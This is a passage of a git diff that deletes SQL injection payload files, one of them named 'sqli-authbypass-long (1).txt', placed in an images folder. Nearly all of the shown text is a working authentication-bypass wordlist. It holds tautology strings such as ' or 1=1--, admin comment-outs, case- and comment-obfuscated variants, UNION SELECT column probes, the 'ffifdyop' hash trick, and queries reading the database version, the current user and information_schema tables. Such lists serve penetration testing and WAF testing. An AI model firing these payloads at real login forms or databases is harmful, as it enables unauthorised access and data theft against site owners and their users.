-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-long (1).txt b/src/images/sqli-authbypass-long (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-long (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
